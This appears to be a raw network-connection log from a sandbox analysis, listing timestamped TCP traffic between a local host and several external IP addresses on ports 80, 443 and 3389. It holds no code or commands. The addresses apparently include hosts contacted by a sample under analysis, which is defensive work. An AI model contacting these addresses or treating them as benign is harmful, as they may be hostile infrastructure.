                                                                                    Sep 27, 2024 00:15:14.789815903 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789824009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789835930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789846897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789853096 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789860010 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789872885 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789886951 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.790169954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.790209055 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.793992996 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870063066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870155096 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870166063 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870177031 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870197058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870208025 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870209932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870225906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870244026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870244026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870256901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870264053 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870270967 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870285988 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870296001 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870301962 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870312929 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870341063 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870354891 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870366096 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870378971 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870390892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870403051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870412111 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870452881 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870496988 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870512962 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870518923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870524883 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870529890 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870536089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870543003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870549917 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870637894 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870723009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870735884 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870748997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870790958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870790958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870831013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870842934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870853901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870865107 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870877028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870898962 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870920897 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.870981932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.870995998 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871007919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871020079 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871031046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871042013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871052980 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.871052980 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.871052980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871078968 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.871099949 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.871123075 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871140003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871159077 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871171951 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871182919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.871187925 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.871215105 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.873980045 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874026060 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874038935 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874039888 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874044895 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874049902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874056101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874078989 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874152899 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874381065 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874393940 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874413967 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874422073 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874475002 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874475002 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874492884 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874505043 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874516964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874522924 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874533892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874547005 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874572992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874572992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874752998 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874763966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874775887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.874809980 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.874838114 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.911361933 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.911439896 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.913265944 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.913271904 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.913513899 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.914995909 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.914995909 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:14.915060997 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.084714890 CEST804977845.132.206.251192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.084794998 CEST4977880192.168.2.445.132.206.251
                                                                                    Sep 27, 2024 00:15:16.085499048 CEST804977845.132.206.251192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.085565090 CEST804977845.132.206.251192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.085769892 CEST4977880192.168.2.445.132.206.251
                                                                                    Sep 27, 2024 00:15:16.085769892 CEST4977880192.168.2.445.132.206.251
                                                                                    Sep 27, 2024 00:15:16.087814093 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.087884903 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.087981939 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:16.168924093 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:16.168943882 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.168996096 CEST49777443192.168.2.4188.114.97.3
                                                                                    Sep 27, 2024 00:15:16.169003010 CEST44349777188.114.97.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.224499941 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.224558115 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.224729061 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.225749016 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.225761890 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.707278013 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.707367897 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.709894896 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.709911108 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.710210085 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.712727070 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.712727070 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:16.712825060 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.168853998 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.168970108 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.169153929 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:18.169732094 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:18.169732094 CEST49779443192.168.2.4172.67.208.139
                                                                                    Sep 27, 2024 00:15:18.169759035 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.169771910 CEST44349779172.67.208.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.197825909 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.197855949 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.198005915 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.200861931 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.200875998 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.850696087 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.850776911 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.854590893 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.854603052 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.854935884 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.857177973 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:18.903398991 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.418672085 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.418731928 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.418836117 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.418836117 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.418859959 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.418926954 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.521760941 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.521789074 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.521888018 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.521904945 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.521976948 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.521976948 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.527612925 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.527693987 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.527703047 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.527723074 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.527753115 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.527797937 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.532349110 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.532365084 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.532445908 CEST49780443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:19.532452106 CEST44349780104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.580601931 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:19.580645084 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.580730915 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:19.581285954 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:19.581300974 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.090770006 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.090854883 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.093516111 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.093530893 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.093844891 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.095326900 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.095408916 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.095443010 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.558621883 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.558718920 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.558783054 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.559175968 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.559202909 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:20.559218884 CEST49781443192.168.2.4172.67.128.144
                                                                                    Sep 27, 2024 00:15:20.559225082 CEST44349781172.67.128.144192.168.2.4
                                                                                    Sep 27, 2024 00:15:29.447557926 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:29.448827982 CEST4977880192.168.2.445.132.206.251
                                                                                    Sep 27, 2024 00:15:30.642575979 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:30.649034023 CEST8049783104.26.13.205192.168.2.4
                                                                                    Sep 27, 2024 00:15:30.650477886 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:30.650614977 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:30.657494068 CEST8049783104.26.13.205192.168.2.4
                                                                                    Sep 27, 2024 00:15:31.230916023 CEST8049783104.26.13.205192.168.2.4
                                                                                    Sep 27, 2024 00:15:31.240803957 CEST497843389192.168.2.48.46.123.33
                                                                                    Sep 27, 2024 00:15:31.247961998 CEST3389497848.46.123.33192.168.2.4
                                                                                    Sep 27, 2024 00:15:31.250370026 CEST497843389192.168.2.48.46.123.33
                                                                                    Sep 27, 2024 00:15:31.254822016 CEST497843389192.168.2.48.46.123.33
                                                                                    Sep 27, 2024 00:15:31.261715889 CEST3389497848.46.123.33192.168.2.4
                                                                                    Sep 27, 2024 00:15:31.262299061 CEST497843389192.168.2.48.46.123.33
                                                                                    Sep 27, 2024 00:15:31.383409023 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:34.891604900 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:34.899521112 CEST8049783104.26.13.205192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.001194000 CEST8049783104.26.13.205192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.026434898 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.026467085 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.026607037 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.039450884 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.039470911 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.086446047 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:35.509882927 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.510025978 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.512173891 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.512203932 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.512470007 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.633328915 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.681992054 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.723417997 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.779113054 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.779886007 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:35.779907942 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:36.217900038 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:36.217987061 CEST44349785188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:36.218064070 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:36.377861977 CEST49785443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:36.384666920 CEST4978380192.168.2.4104.26.13.205
                                                                                    Sep 27, 2024 00:15:36.384963989 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:39.406685114 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:39.406728983 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:39.406831026 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:39.409102917 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:39.409121037 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.054264069 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.054335117 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.100964069 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.100994110 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.101376057 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.101433039 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.102951050 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.147412062 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.573158026 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.573189974 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.573205948 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.573245049 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.573281050 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.573295116 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.573329926 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.735373020 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.735404015 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.735502958 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.735532045 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.735580921 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.742643118 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.742714882 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.742727041 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.742738962 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.742774010 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.742804050 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.743194103 CEST49786443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:15:40.743210077 CEST44349786104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.754158020 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:40.754199028 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:40.754290104 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:40.754553080 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:40.754564047 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:41.429867029 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:41.429970980 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:41.433407068 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:41.433415890 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:41.433669090 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:41.433732033 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:41.434067011 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:41.479396105 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.073081017 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.073216915 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.073230028 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.073266983 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.073282957 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.073307991 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.074490070 CEST49787443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.074501991 CEST443497875.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.077043056 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.077094078 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.077172995 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.077445984 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.077460051 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.919558048 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.919657946 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.920172930 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.920177937 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:42.922123909 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:42.922128916 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.631167889 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.631225109 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.631239891 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.631259918 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.631280899 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.631305933 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.631458044 CEST49788443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.631470919 CEST443497885.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.632960081 CEST49789443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.633003950 CEST443497895.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:43.633085012 CEST49789443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.633291006 CEST49789443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:43.633306980 CEST443497895.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:44.282233953 CEST443497895.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:44.282335997 CEST49789443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:44.282831907 CEST49789443192.168.2.45.75.211.162
